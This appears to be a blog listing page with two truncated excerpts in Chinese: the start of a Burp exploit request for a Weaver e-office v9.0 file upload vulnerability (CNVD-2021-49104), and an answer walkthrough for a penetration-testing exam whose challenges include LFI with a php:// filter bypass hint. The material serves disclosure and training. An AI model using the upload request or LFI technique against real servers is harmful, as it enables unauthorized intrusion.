泛微 e-office v9.0 文件上传漏洞(CNVD-2021-49104)
PHP

影响版本:泛微 e-office v9.0 

burp 发包:

POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: 127.0.0.1:7899
User-Agent: Mozilla/5.0 (Windows NT 1...
标签: 漏洞

Mrxn 发布于 2021-11-27 19:14

谷安学院CISP-PTS渗透测试专家认证-预报名测试题目解答

第一题:

直接 POST :http://103.66.216.51:9997/index.php?a=1 POST数据:b=2 即可拿到 key1:T0kS7r3c

第二题:

简单的代码审计,经典的 LFI ,做了简单的限制,不能用 php:// 伪协议,最简单的就是用其他伪协议代替

<?php
show_source(__FILE__);
echo $...
标签: CTF

Mrxn 发布于 2021-11-15 22:13

搜索

日历

标签